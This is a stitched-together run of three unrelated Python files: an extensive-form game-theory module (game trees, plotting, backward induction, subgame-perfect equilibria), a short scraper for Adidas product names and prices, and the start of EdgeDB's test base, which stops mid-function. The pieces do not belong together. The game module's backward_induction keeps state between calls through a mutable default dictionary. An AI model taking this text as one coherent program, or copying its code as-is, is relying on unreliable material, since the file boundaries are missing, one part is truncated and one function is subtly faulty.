r"""Implementation of games in extensive form.
The most important class of the module is ``ExtensiveFormGame``, which
provides support for n-player extensive form games, including chance moves.
It also provides support for a graphical representation of the game tree and
implementation for the backward induction algorithm, which is used to compute
subgame-perfect equilibrium strategies and equilibrium paths that are expected
to be played by perfectly rational agents.
References
----------
<NAME>, <NAME>, <NAME>, An Introductory
Course on Mathematical Game Theory, American Mathematical Society and Real
Sociedad Matemática Española, 2010. https://doi.org/10.1016/j.geb.2010.12.006.
"""
import networkx as nx
from networkx.algorithms.simple_paths import all_simple_edge_paths
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import pandas as pd
import random
from itertools import combinations
from copy import deepcopy
from typing import Any, Dict, List, Set, Tuple
class ExtensiveFormGame:
r"""Implementation of a game in extensive form.
The game is initialized 'empty', meaning with minimal attribute
assignments. Attributes are then set through the various methods. The
extensive form game is modelled as described in the reference, see the
chapter on extensive games.
Parameters
----------
**kwargs
Additional keyword arguments.
Attributes
----------
game_tree : networkx.DiGraph
Game tree, directed graph. Other than the methods and attributes of the
class, two additional attributes are set:
* root : Any
The root node, initialized to None.
* terminal_nodes : List[Any]
The list of terminal nodes, initialized to an empty list.
The game tree is initialized as empty.
information_partition : Dict[Any, List[Set[Any]]]
        Maps every player (key) to the list of that player's information
        sets (value).
    is_perfect_information : bool, `True`
The game is initialized as being of perfect information.
players : List[Any]
List of players in the game. It is initialized empty.
probability : Dict[Any, Dict[Tuple[Any, Any], float]]
Probability distributions over the outgoing edges at every node where
chance takes an action. The keys are the nodes where chance acts. The
values are dictionaries mapping every outgoing edge from that node to
its probability.
turn_function : Dict[Any, Any]
Function that maps every non-terminal node to the player whose turn it
is to take an action at the node.
utility : Dict[Any, Dict[Any, float]]
For every terminal node, it maps the utility that the various players
(excluding chance) assign to it.
See Also
--------
networkx.DiGraph
"""
def __init__(self, **kwargs) -> None:
# players
self.players = []
# game tree
self.game_tree = nx.DiGraph()
self.game_tree.root = None
self.game_tree.terminal_nodes = []
# turn function
self.turn_function = {}
# information partition
self.information_partition = {}
self.is_perfect_information = True
# probability distribution over chance edges
self.probability = {}
# utility function
self.utility = {}
# additional info
for k, v in kwargs.items():
setattr(self, k, v)
def __check_player_in_game(self, player_id: Any) -> None:
r"""Check that the given player is actually in the game.
Parameters
----------
player_id : Any
Raises
------
ValueError
If the player is not in the game.
"""
if player_id not in self.players:
raise ValueError("player {} not in game".format(player_id))
def __check_nonterminal_node(self, node_id: Any) -> None:
r"""Check that a node is in the game tree.
Parameters
----------
node_id : Any
Raises
------
ValueError
            If the node is not among the non-terminal nodes of the game tree.
"""
if node_id not in self.get_nonterminal_nodes():
raise ValueError("node {} is a terminal node".format(node_id))
def __check_terminal_node(self, node_id: Any) -> None:
r"""Check that a node is terminal.
Parameters
----------
node_id : Any
Raises
------
ValueError
If the node is not terminal.
"""
if node_id not in self.game_tree.terminal_nodes:
raise ValueError("node {} is not a terminal node".format(node_id))
def add_players(self, *players_id: Any) -> None:
r"""Add a lists of players to the game, encoded in any data structure.
Parameters
----------
players_id : List[Any]
Players to be added to the game. Exclude 'chance'.
Raises
------
ValueError
If 'chance' is among the players to be added.
"""
for p in players_id:
if p == 'chance':
raise ValueError("player 'chance' should not added to the \
game")
if p not in self.players:
self.players.append(p)
self.information_partition[p] = []
def add_node(self, node_id: Any, player_turn: Any = None,
is_root: bool = False) -> None:
r"""Add a node the game tree.
If the node is non-terminal and it is not a chance node, perfect
information is assumed. A set containing the single node is added to
the information partition of the player playing at the node.
Also, if the node is non-terminal (regardless of whether it is a
chance node or not), it is added to `turn_function` and its player is
assigned.
Parameters
----------
node_id : Any
Node to be added.
player_turn : Any, optional
            The player whose turn it is at the node. If None is given, it is
assumed that the node is terminal. The default is None.
is_root : bool, optional
Whether the node is the root of the game tree. The default is False.
"""
self.game_tree.add_node(node_id)
# if player turn given
if player_turn:
self.turn_function[node_id] = player_turn
# add player to game if not already there
if player_turn not in self.players and player_turn != 'chance':
self.players.append(player_turn)
# if not a chance node, assume perfect information
if player_turn != 'chance':
self.__check_player_in_game(player_turn)
self.information_partition[player_turn].append({node_id})
# if player turn not given, it is a terminal node
else:
self.game_tree.terminal_nodes.append(node_id)
# assign as root if indicated
if is_root:
self.game_tree.root = node_id
def set_node_player(self, node_id: Any, player_turn: Any) -> None:
r"""Set the player at a node after it has been added to the game tree.
        If the node had previously been designated as a terminal node, it is
        removed from that list.
Parameters
----------
node_id : Any
The node whose player changes.
player_turn : Any
The new player that takes turn at the node.
"""
self.turn_function[node_id] = player_turn
# add player to game if not already there
if player_turn not in self.players and player_turn != 'chance':
self.players.append(player_turn)
# delete node from terminal nodes if there
if node_id in self.game_tree.terminal_nodes:
self.game_tree.terminal_nodes.remove(node_id)
def add_edge(self, from_node: Any, to_node: Any, label: Any) -> None:
r"""Add an edge to the game tree between two nodes.
Parameters
----------
from_node : Any
Origin node of the edge.
to_node : Any
Destination node of the edge.
label : Any
            The edge label corresponding to the action being taken.
"""
self.game_tree.add_edge(from_node, to_node, action=label)
def get_nonterminal_nodes(self) -> List[Any]:
r"""Obtain the list of non-terminal nodes in the game tree.
Returns
-------
List[Any]
List of non-terminal nodes.
"""
nonterminal_nodes = []
for n in self.game_tree.nodes:
if n not in self.game_tree.terminal_nodes:
nonterminal_nodes.append(n)
return nonterminal_nodes
def get_theta_partition(self) -> Dict[Any, Set[Any]]:
r"""Get the turns partition.
The turns partition (or :math:`\Theta` partition) splits the
        non-terminal nodes into disjoint sets, according to whose turn it is
to play at the node (including the 'chance' player).
Returns
-------
Dict[Any, Set[Any]]
For every player in the game, including 'chance', the set of nodes
where it is that player's turn to play.
"""
# initialize partitions to empty set
theta_partition = {}
for p in self.players:
theta_partition[p] = set()
theta_partition['chance'] = set()
# add nodes to their corresponding partition
for n in self.get_nonterminal_nodes():
node_turn = self.turn_function[n]
theta_partition[node_turn].add(n)
return theta_partition
def get_player_utility(self, player_id: Any) -> Dict[Any, float]:
r"""Return the utility function for the given player.
Parameters
----------
player_id : Any
Returns
-------
Dict[Any, float]
A map from every terminal node to the utility assigned to it by
the given player.
"""
self.__check_player_in_game(player_id)
utility_i = {}
for n in self.game_tree.terminal_nodes:
utility_i[n] = self.utility[n][player_id]
return utility_i
def get_available_actions(self, node: Any) -> Set[Any]:
r"""Get what actions are available at the given node.
Parameters
----------
node : Any
Returns
-------
Set[Any]
Set of available actions according to the game tree.
"""
actions = set()
for e in self.game_tree.out_edges(node):
a = self.game_tree.get_edge_data(*e)['action']
actions.add(a)
return actions
def get_choice_set(self, player_id: Any, information_set: Set[Any]) \
-> Set[Any]:
r"""Get the choice set for some player at some information set.
Parameters
----------
player_id : Any
information_set : Set[Any]
The information set for which the choice set is to be retrieved.
Returns
-------
        Set[Any]
            The set of actions available at the nodes of the information set.
"""
self.__check_player_in_game(player_id)
assert information_set in self.information_partition[player_id], \
"information set {} does not belong to player {}'s information \
partition".format(information_set, player_id)
choice_set = self.get_available_actions(list(information_set)[0])
return choice_set
def get_utility_table(self) -> pd.DataFrame:
r"""Get a pandas dataframe with the utility for every player.
Returns
-------
utility_table : pandas.DataFrame
"""
data = {}
terminal_nodes = self.game_tree.terminal_nodes
data['Terminal node'] = terminal_nodes
for pos in self.players:
data[pos.capitalize()] = [self.utility[n][pos] for n in
terminal_nodes]
utility_table = pd.DataFrame(data)
utility_table.set_index('Terminal node', inplace=True)
return utility_table
def add_information_sets(self, player_id: Any,
*additional_info_sets: Set[Any]) -> None:
r"""Add an information set to the partition of the given player.
This method does not require that all nodes where ``player_id`` takes
        an action are included in some information set. It does check that all
        the nodes in the information sets to be added belong to the theta
        partition of ``player_id``, and that they have not been previously
included in some other information set.
Parameters
----------
player_id : Any
The game player whose information partition is to be expanded.
*additional_info_sets : Set[Any]
The information sets that are to be added.
"""
self.__check_player_in_game(player_id)
self.is_perfect_information = False
# check that the nodes in the information sets belong to the theta
# partition of the player
theta_partition = self.get_theta_partition()[player_id]
# check that the nodes in the additional information sets are not
# already in the information partition
all_sets = self.information_partition[player_id]
info_sets_union = [x for y in all_sets for x in y]
for s in additional_info_sets:
for n in s:
assert n in theta_partition, "node {} not in the turn \
function of player {}".format(n, player_id)
assert n not in info_sets_union, "node {} already in \
information partition of player {}".format(n, player_id)
for s in additional_info_sets:
self.information_partition[player_id].append(s)
def set_information_partition(self, player_id: Any,
*partition: Set[Any]) -> None:
r"""Set the information partition of the given player.
It is only useful to call this method when modeling games with
imperfect information, otherwise when nodes are added to the game tree
perfect information is assumed by default.
The method checks that all the nodes where it is the player's turn to
        move are included in the information partition, and vice versa, that at
all the nodes in the various information sets it is the player's turn.
Also, it checks that all the nodes in any given information set have
the same number of outgoing edges, and that they are non-terminal.
Parameters
----------
player_id : Any
partition : Set[Any]
Information sets making up the player's information
partition.
Raises
------
AssertionError
            If the union of information sets does not correspond to the same nodes
where it is the player's turn to play, or
If some nodes in the same information set have different amounts of
outgoing edges, or
If some node is terminal.
Notes
-----
Please note that the method does not check that all the information
        sets provided are disjoint.
"""
self.__check_player_in_game(player_id)
self.is_perfect_information = False
# check that all the nodes where the player plays are included in the
# information partition
theta_player = self.get_theta_partition()[player_id]
nodes_in_info_sets = set()
for p in partition:
nodes_in_info_sets.update(p)
assert theta_player == nodes_in_info_sets, "the information set for\
player {} is missing some nodes".format(player_id)
for p in partition:
# check that all nodes in information set have the same available
# actions
all_avail_actions = [self.get_available_actions(n) for n in p]
assert all(av == all_avail_actions[0] for av in
all_avail_actions), "nodes in information set {} have \
different available actions".format(p)
# check that nodes are not terminal
for n in p:
self.__check_nonterminal_node(n)
# replace current partition with the new one
self.information_partition[player_id] = []
for p in partition:
self.information_partition[player_id].append(p)
def set_probability_distribution(self, node_id: Any,
prob_dist: Dict[Tuple[Any], float]) -> \
None:
r"""Set the probabilities over the outgoing edges of a chance node.
Parameters
----------
node_id : Any
Node over whose outgoing edges the probability is given.
prob_dist : Dict[Tuple[Any], float]
Probability distribution over the outgoing edges of the node.
Raises
------
ValueError
If at the given node, it is not chance's turn, or if one of the
provided edges does not have the given node as origin, or if there
is some edge going out from the node for which the probability
is not specified.
AssertionError
If the sum of the probabilities over all the edges is not close to
            unity with :math:`10^{-3}` absolute tolerance.
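        Examples
        --------
        Assuming ``game`` is this game and ``'c'`` is a chance node with
        outgoing edges to ``'a'`` and ``'b'`` (purely illustrative names):
        >>> game.set_probability_distribution('c', {('c', 'a'): 0.4,
        ...                                         ('c', 'b'): 0.6})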
"""
if self.turn_function[node_id] != 'chance':
raise ValueError("it is not chance's turn at node {}".
format(node_id))
outgoing_edges = self.game_tree.out_edges(node_id)
for e in prob_dist.keys():
if e not in outgoing_edges:
raise ValueError("edge {} is not an outgoing edge from {}"
.format(e, node_id))
for e in outgoing_edges:
if e not in prob_dist.keys():
raise ValueError("probability not specified for edge {}".
format(e))
assert np.isclose([sum(prob_dist.values())], [1], atol=1.E-3)[0], \
"sum over probability distribution of edges must be close to 1"
self.probability[node_id] = prob_dist
def set_uniform_probability_distribution(self, node_id: Any) -> None:
r"""Set a equal probabilities over the outgoing edges of a chance node.
Parameters
----------
node_id : Any
A node where chance takes its turn.
"""
outgoing_edges = self.game_tree.out_edges(node_id)
uniform_prob_dist = {e: 1/len(outgoing_edges) for e in outgoing_edges}
self.set_probability_distribution(node_id, uniform_prob_dist)
def set_utility(self, node_id: Any, utilities: Dict[Any, float]) -> None:
r"""Set the utility for all players at the given terminal node.
Parameters
----------
node_id : Any
A terminal node.
utilities : Dict[Any, float]
Dictionary that maps every player in the game to the utility it
assigns to the terminal node.
"""
self.__check_terminal_node(node_id)
self.utility[node_id] = {}
for pos, u in utilities.items():
self.__check_player_in_game(pos)
self.utility[node_id][pos] = u
def get_action_sequence(self, terminal_node: Any) -> \
Tuple[List[Tuple[str, str]], float]:
r"""Get the sequence of actions and probability to a terminal node.
Parameters
----------
terminal_node : Any
The terminal node to get the sequence of actions from the root.
Returns
-------
action_sequence : List[Tuple[str,str]]
            The sequence of actions from the root to the terminal node, as a
list of tuples of (player, action).
probability : float
The probability of the sequence of actions.
"""
self.__check_terminal_node(terminal_node)
paths = list(all_simple_edge_paths(self.game_tree, self.game_tree.root,
terminal_node))
        assert len(paths) == 1, \
            "path search did not return exactly one path"
path = paths[0]
action_sequence = []
probability = 1
for (n1, n2) in path:
active_player = self.turn_function[n1]
if active_player == 'chance':
probability *= self.probability[n1][(n1, n2)]
continue
action = self.game_tree.get_edge_data(n1, n2)['action']
action_sequence.append((active_player, action))
return action_sequence, probability
def hierarchy_pos(G: Any, root: Any = None, width: float = 1.,
vert_gap: float = 0.2, vert_loc: float = 0,
xcenter: float = 0.5) -> Dict[Any, Tuple[float, float]]:
r"""From Joel's answer at https://stackoverflow.com/a/29597209/2966723.
Licensed under Creative Commons Attribution-Share Alike.
    If the graph is a tree this will return the positions to plot this in a
hierarchical layout.
Parameters
----------
G : Any
        The graph (must be a tree). In practice, it must be an instance of one of
the classes provided by `networkx`.
root : Any, optional
        The root node of the current branch. The default is None.
* If the tree is directed and this is not given, the root will be found
and used.
        * If the tree is directed and this is given, then the positions will
          be computed just for the descendants of this node.
* If the tree is undirected and not given, then a random choice will be
used.
width : float, optional
Horizontal space allocated for this branch - avoids overlap with other
        branches. The default is 1.0.
vert_gap : float, optional
Gap between levels of hierarchy. The default is 0.2.
vert_loc : float, optional
Vertical location of root. The default is 0.
xcenter : float, optional
Horizontal location of root. The default is 0.5.
Raises
------
TypeError
If the graph is not a tree.
Returns
-------
Dict[Any, Tuple[float, float]]
        Mapping from every node in the tree to its layout position.
See Also
--------
networkx.is_tree
"""
if not nx.is_tree(G):
raise TypeError('cannot use hierarchy_pos on a graph that is not a \
tree')
if root is None:
if isinstance(G, nx.DiGraph):
root = next(iter(nx.topological_sort(G)))
else:
root = random.choice(list(G.nodes))
def _hierarchy_pos(G: Any, root: Any = None, width: float = 1.,
vert_gap: float = 0.2, vert_loc: float = 0,
xcenter: float = 0.5,
pos: Dict[Any, Tuple[float, float]] = None,
parent: Any = None):
r"""See hierarchy_pos for most arguments.
Parameters
----------
pos : Dict[Any, Tuple[float, float]]
A dictionary saying where all nodes go if they have been assigned.
Default is None.
parent : Any
Parent of this branch - only affects it if non-directed.
Default is None.
"""
if pos is None:
pos = {root: (xcenter, vert_loc)}
else:
pos[root] = (xcenter, vert_loc)
children = list(G.neighbors(root))
if not isinstance(G, nx.DiGraph) and parent is not None:
children.remove(parent)
if len(children) != 0:
dx = width/len(children)
nextx = xcenter - width/2 - dx/2
for child in children:
nextx += dx
pos = _hierarchy_pos(G, child, width=dx, vert_gap=vert_gap,
vert_loc=vert_loc-vert_gap, xcenter=nextx,
pos=pos, parent=root)
return pos
return _hierarchy_pos(G, root, width, vert_gap, vert_loc, xcenter)
def plot_game(game: ExtensiveFormGame,
player_colors: Dict[Any, str],
utility_label_shift: float = 0.03,
fig_kwargs: Dict[str, Any] = None,
node_kwargs: Dict[str, Any] = None,
edge_kwargs: Dict[str, Any] = None,
edge_labels_kwargs: Dict[str, Any] = None,
patch_kwargs: Dict[str, Any] = None,
legend_kwargs: Dict[str, Any] = None,
draw_utility: bool = True,
decimals: int = 1,
utility_label_kwargs: Dict[str, Any] = None,
info_sets_kwargs: Dict[str, Any] = None) -> plt.Figure:
r"""Make a figure of the game tree.
Encoded information:
* Node colors encode the turn function at every node.
    * Dashed arcs between nodes indicate information sets.
    * Numbers in parentheses below terminal nodes indicate utilities
(optional).
Parameters
----------
game : ExtensiveFormGame
A game in extensive form to be plotted.
player_colors : Dict[Any, str]
Dictionary mapping every player in the game to the color to use for the
nodes where it is the player's turn. Color white is not recommended, as
it is reserved for chance nodes.
utility_label_shift : float, optional
To adjust the utility labels under the terminal nodes.
The default is 0.03.
fig_kwargs : Dict[str, Any], optional
        Additional keyword arguments related to the rendering of the figure -
they are passed to `matplotlib.pyplot.subplots`.
The default is None.
node_kwargs : Dict[str, Any], optional
Additional keyword arguments related to the rendering of the game tree
        nodes - they are passed to `nx.draw_networkx`.
The default is None.
edge_kwargs : Dict[str, Any], optional
Additional keyword arguments related to the rendering of the game tree
        edges - they are passed to `nx.draw_networkx`.
The default is None.
edge_labels_kwargs : Dict[str, Any], optional
Additional keyword arguments related to the rendering of the edge
        labels - they are passed to `nx.draw_networkx_edge_labels`.
The default is None.
patch_kwargs : Dict[str, Any], optional
Additional keyword arguments related to the rendering of the legend
patches - they are passed to `matplotlib.patches.Patch`.
The default is None.
legend_kwargs : Dict[str, Any], optional
Additional keyword arguments related to the rendering of the legend -
they are passed to `matplotlib.axes.Axes.legend`.
The default is None.
draw_utility : bool, optional
Whether labels should be drawn below the terminal nodes displaying the
utilities for all players.
The default is True.
decimals : int, optional
        The number of decimal places for the utility labels.
The default is 1.
utility_label_kwargs : Dict[str, Any], optional
Additional keyword arguments related to the rendering of the utility
labels at the terminal nodes - they are passed to
`matplotlib.pyplot.text`.
The default is None.
info_sets_kwargs : Dict[str, Any], optional
        Additional keyword arguments related to the rendering of the arcs
        connecting the information sets - they are passed to
        `matplotlib.patches.Arc`.
The default is None.
Returns
-------
fig : matplotlib.figure.Figure
"""
    # treat the optional keyword-argument dicts as empty when left as None,
    # so that the ** unpacking below does not fail
    fig_kwargs = fig_kwargs or {}
    node_kwargs = node_kwargs or {}
    edge_kwargs = edge_kwargs or {}
    edge_labels_kwargs = edge_labels_kwargs or {}
    patch_kwargs = patch_kwargs or {}
    legend_kwargs = legend_kwargs or {}
    utility_label_kwargs = utility_label_kwargs or {}
    info_sets_kwargs = info_sets_kwargs or {}
    pos = hierarchy_pos(game.game_tree, game.game_tree.root)
fig, ax = plt.subplots(**fig_kwargs)
fig.patch.set_visible(False)
ax.axis('off')
# if there is chance in the game and it does not have a color, set it to
# white
if game.get_theta_partition()['chance'] != set():
if 'chance' not in player_colors.keys():
player_colors['chance'] = 'white'
# draw the game tree
node_col = []
for n in game.game_tree.nodes:
if n in game.game_tree.terminal_nodes:
col = 'silver'
else:
player = game.turn_function[n]
col = player_colors[player]
node_col.append(col)
nx.draw_networkx(game.game_tree, pos=pos, ax=ax, with_labels=True,
node_color=node_col, **node_kwargs, **edge_kwargs)
# prepare edge labels
edge_labels = {}
for e in game.game_tree.edges:
label = game.game_tree.get_edge_data(*e)['action']
parent_node = e[0]
parent_player = game.turn_function[parent_node]
# if edge is action from chance, add probability
if parent_player == 'chance':
prob = game.probability[parent_node][e]
label += ' ({:.2f})'.format(prob)
edge_labels[e] = label
# draw edge labels
nx.draw_networkx_edge_labels(game.game_tree, pos=pos, ax=ax,
edge_labels=edge_labels, **edge_labels_kwargs)
# draw legend
handles = []
for player, col in player_colors.items():
patch = mpatches.Patch(color=col, label=player, **patch_kwargs)
patch.set_edgecolor('black')
handles.append(patch)
ax.legend(handles=handles, **legend_kwargs)
# draw utility on terminal nodes
if draw_utility:
terminal_nodes = game.game_tree.terminal_nodes
for n in terminal_nodes:
utility_label_player = (pos[n][0], pos[n][1]-utility_label_shift)
utilities_node = ["{:.{prec}f}".
format(game.utility[n][p],
prec=decimals) for p in game.players
if p != 'chance']
utility_label = '{}'.format('\n'.join(utilities_node))
plt.text(*utility_label_player, utility_label, ha='center',
va='bottom', **utility_label_kwargs)
    # draw arcs between nodes in the same information set
for player in game.players:
if player == 'chance':
continue
for info_set in game.information_partition[player]:
if len(info_set) == 1:
continue
for u, v in combinations(info_set, r=2):
x = (pos[u][0] + pos[v][0])/2
y = (pos[u][1] + pos[v][1])/2
width = abs(pos[u][0] - pos[v][0])
height = 0.1
arch = mpatches.Arc((x, y), width, height, theta1=0,
theta2=180,
edgecolor=player_colors[player],
fill=False, **info_sets_kwargs)
ax.add_patch(arch)
plt.show()
plt.close(fig)
return fig
def backward_induction(game: ExtensiveFormGame, h: Any,
u_dict: Dict[Any, Dict[Any, float]] = {}) \
-> Dict[Any, Dict[Any, float]]:
r"""Compute the value of node `h` in a subgame by backward induction.
It computes the values of all the nodes in the subgame having `h` as its
root node. Only for games with perfect information.
Parameters
----------
game : ExtensiveFormGame
        A game in extensive form. Must be a game of perfect information;
        chance nodes are handled by taking expected values.
h : Any
The root of the subgame where to start computing.
u_dict : Dict[Any, Dict[Any, float]], optional
A dictionary of the values for every player at the nodes that have
already been revisited. The default is {}, and it should not be
modified. It is necessary to perform the recursion.
Returns
-------
Dict[Any, Dict[Any, float]]
A dictionary mapping, for each visited node (all the descendants of
`h`), the value assigned to it by every player in the game.
"""
if h in game.game_tree.terminal_nodes:
u_dict[h] = game.utility[h]
return u_dict
player = game.turn_function[h]
if player == 'chance':
u = {p: 0. for p in game.players}
else:
u = {p: -float('inf') for p in game.players}
u_dict[h] = u
for e in game.game_tree.out_edges(h):
child = e[1]
u_child = backward_induction(game, child, u_dict)[child]
if player == 'chance':
prob_edge = game.probability[h][e]
for pos in game.players:
u[pos] += prob_edge*u_child[pos]
else:
if u_child[player] > u[player]:
u = u_child
u_dict[h] = u
return u_dict
def subgame_perfect_equilibrium(game: ExtensiveFormGame) -> Dict[Any, Any]:
r"""Find a subgame perfect equilibrium in pure strategies.
Parameters
----------
game : ExtensiveFormGame
The game in extensive form.
Returns
-------
SPE : Dict[Any, Any]
        A subgame perfect equilibrium in pure strategies, mapping each node to
the action to be taken.
"""
values_dict = backward_induction(game, game.game_tree.root)
SPE = {}
for n in game.game_tree.nodes:
if n in game.game_tree.terminal_nodes:
continue
player = game.turn_function[n]
if player == 'chance':
continue
next_value = -float('inf')
action = None
for e in game.game_tree.out_edges(n):
child = e[1]
if values_dict[child][player] > next_value:
next_value = values_dict[child][player]
action = (e, game.game_tree.get_edge_data(*e)['action'])
SPE[n] = action
return SPE
def DFS_equilibria_paths(game: ExtensiveFormGame, h: Any,
pure_strategy: Dict[Any, Any], path: List[Any],
probability: float,
path_store: List[Tuple[List[Any], float]]) -> None:
r"""Find all the equilibrium paths.
This function finds all of the paths given the deterministic strategy and
considering the chance nodes, and stores (path, probability) tuples in a
`store`.
Parameters
----------
game : ExtensiveFormGame
The game being played.
h : Any
The node where play starts.
pure_strategy : Dict[Any, Any]
A dictionary mapping every decision node to the (edge, action) pair to
be followed.
path : List[Any]
The path played before reaching the current node.
probability : float
The probability of playing the path played before reaching the current
node.
path_store : List[Tuple[List[Any], float]]
        A store where the computed paths are stored along with their
probabilities of being played.
Examples
--------
The intended way to call this function is:
>>> path_store = []
>>> DFS_equilibria_paths(game, game.game_tree.root, pure_strat, [], 1, \
path_store)
>>> print(path_store)
"""
path.append(h)
# if the current node is a decision node
if h in pure_strategy.keys():
next_node = pure_strategy[h][0][1]
action = pure_strategy[h][1]
path.append(action)
DFS_equilibria_paths(game, next_node, pure_strategy, path, probability,
path_store)
# if the current node is a chance node
elif h in game.turn_function.keys() and game.turn_function[h] == 'chance':
prob_until_chance = probability
for e in game.game_tree.out_edges(h):
path_until_chance = deepcopy(path)
next_node = e[1]
action = game.game_tree.get_edge_data(*e)['action']
path_until_chance.append(action)
prob = prob_until_chance*game.probability[h][e]
DFS_equilibria_paths(game, next_node, pure_strategy,
path_until_chance, prob, path_store)
# if current node is terminal, append path to the store
else:
path_store.append((path, probability))
if __name__ == '__main__':
pass
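# Hedged usage sketch (not part of the original module): build a tiny
# perfect-information game with made-up players, nodes and payoffs, then
# solve it with the functions defined above.
def _example_usage():
    game = ExtensiveFormGame()
    game.add_players('alice', 'bob')
    # decision nodes: 'alice' moves at the root, 'bob' after action 'L'
    game.add_node('root', player_turn='alice', is_root=True)
    game.add_node('after_L', player_turn='bob')
    # terminal nodes (no player_turn given)
    for leaf in ('after_R', 'LU', 'LD'):
        game.add_node(leaf)
    # edges labelled with the action taken
    game.add_edge('root', 'after_L', label='L')
    game.add_edge('root', 'after_R', label='R')
    game.add_edge('after_L', 'LU', label='U')
    game.add_edge('after_L', 'LD', label='D')
    # utilities at the terminal nodes
    game.set_utility('after_R', {'alice': 1., 'bob': 0.})
    game.set_utility('LU', {'alice': 2., 'bob': 1.})
    game.set_utility('LD', {'alice': 0., 'bob': 2.})
    # subgame-perfect equilibrium and the equilibrium paths it induces
    spe = subgame_perfect_equilibrium(game)
    path_store = []
    DFS_equilibria_paths(game, game.game_tree.root, spe, [], 1, path_store)
    return spe, path_store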
from requests import get
from selectorlib import Extractor
def _adidas(adidas_url):
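    """Scrape the product name and price from an Adidas product page.
    Returns the dictionary produced by selectorlib, keyed by the selectors
    defined below ('name' and 'price').
    """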
extractor = Extractor.from_yaml_string("""
name:
css: 'div.sidebar___2C-EP h1.gl-heading span'
xpath: null
type: Text
price:
css: 'div.sidebar___2C-EP div.gl-price-item'
xpath: null
type: Text
""")
headers = {
'authority': 'www.adidas.com',
'pragma': 'no-cache',
'cache-control': 'no-cache',
'dnt': '1',
'upgrade-insecure-requests': '1',
'user-agent':
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36',
'accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'sec-fetch-site': 'none',
'sec-fetch-mode': 'navigate',
'sec-fetch-dest': 'document',
'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8'
}
website = get(adidas_url, headers=headers)
productdata = extractor.extract(website.text)
return productdata
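# Hedged usage sketch; the URL below is a made-up placeholder, not a real
# Adidas product page.
if __name__ == '__main__':
    example_url = 'https://www.adidas.com/us/example-product/XX0000.html'
    print(_adidas(example_url))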
#
# This source file is part of the EdgeDB open source project.
#
# Copyright 2016-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import annotations
import asyncio
import atexit
import collections
import contextlib
import decimal
import functools
import inspect
import json
import math
import os
import pprint
import re
import unittest
import uuid
from datetime import timedelta
import click.testing
import edgedb
from edb import cli
from edb.server import cluster as edgedb_cluster
from edb.server import defines as edgedb_defines
from edb.common import taskgroup
from edb.testbase import serutils
def get_test_cases(tests):
result = collections.OrderedDict()
for test in tests:
if isinstance(test, unittest.TestSuite):
result.update(get_test_cases(test._tests))
else:
cls = type(test)
try:
methods = result[cls]
except KeyError:
methods = result[cls] = []
methods.append(test)
return result
class TestCaseMeta(type(unittest.TestCase)):
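    """Metaclass that wraps coroutine ``test_*`` methods so they run on the
    class event loop, retrying on transaction serialization errors.
    """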
_database_names = set()
@staticmethod
def _iter_methods(bases, ns):
for base in bases:
for methname in dir(base):
if not methname.startswith('test_'):
continue
meth = getattr(base, methname)
if not inspect.iscoroutinefunction(meth):
continue
yield methname, meth
for methname, meth in ns.items():
if not methname.startswith('test_'):
continue
if not inspect.iscoroutinefunction(meth):
continue
yield methname, meth
@classmethod
def wrap(mcls, meth):
@functools.wraps(meth)
def wrapper(self, *args, __meth__=meth, **kwargs):
try_no = 1
while True:
try:
# There might be unobvious serializability
# anomalies across the test suite, so, rather
# than hunting them down every time, simply
# retry the test.
self.loop.run_until_complete(
__meth__(self, *args, **kwargs))
except edgedb.TransactionSerializationError:
if try_no == 3:
raise
else:
self.loop.run_until_complete(self.con.execute(
'ROLLBACK;'
))
try_no += 1
else:
break
return wrapper
@classmethod
def add_method(mcls, methname, ns, meth):
ns[methname] = mcls.wrap(meth)
def __new__(mcls, name, bases, ns):
for methname, meth in mcls._iter_methods(bases, ns.copy()):
if methname in ns:
del ns[methname]
mcls.add_method(methname, ns, meth)
cls = super().__new__(mcls, name, bases, ns)
if not ns.get('BASE_TEST_CLASS') and hasattr(cls, 'get_database_name'):
dbname = cls.get_database_name()
if name in mcls._database_names:
raise TypeError(
f'{name} wants duplicate database name: {dbname}')
mcls._database_names.add(name)
return cls
class TestCase(unittest.TestCase, metaclass=TestCaseMeta):
@classmethod
def setUpClass(cls):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
cls.loop = loop
@classmethod
def tearDownClass(cls):
cls.loop.close()
asyncio.set_event_loop(None)
def add_fail_notes(self, **kwargs):
if not hasattr(self, 'fail_notes'):
self.fail_notes = {}
self.fail_notes.update(kwargs)
@contextlib.contextmanager
def annotate(self, **kwargs):
# Annotate the test in case the nested block of code fails.
try:
yield
except Exception:
self.add_fail_notes(**kwargs)
raise
@contextlib.contextmanager
def assertRaisesRegex(self, exception, regex, msg=None,
**kwargs):
with super().assertRaisesRegex(exception, regex, msg=msg):
try:
yield
except BaseException as e:
if isinstance(e, exception):
for attr_name, expected_val in kwargs.items():
val = getattr(e, attr_name)
if val != expected_val:
raise self.failureException(
f'{exception.__name__} context attribute '
f'{attr_name!r} is {val} (expected '
f'{expected_val!r})') from e
raise
_default_cluster = None
def _init_cluster(data_dir=None, *, cleanup_atexit=True, init_settings=None):
if init_settings is None:
init_settings = {}
if (not os.environ.get('EDGEDB_DEBUG_SERVER') and
not os.environ.get('EDGEDB_LOG_LEVEL')):
_env = {'EDGEDB_LOG_LEVEL': 'silent'}
else:
_env = {}
if data_dir is None:
cluster = edgedb_cluster.TempCluster(env=_env, testmode=True)
destroy = True
else:
cluster = edgedb_cluster.Cluster(data_dir=data_dir, env=_env)
destroy = False
if cluster.get_status() == 'not-initialized':
cluster.init(server_settings=init_settings)
cluster.start(port='dynamic')
cluster.set_superuser_password('<PASSWORD>')
if cleanup_atexit:
atexit.register(_shutdown_cluster, cluster, destroy=destroy)
return cluster
def _start_cluster(*, cleanup_atexit=True):
global _default_cluster
if _default_cluster is None:
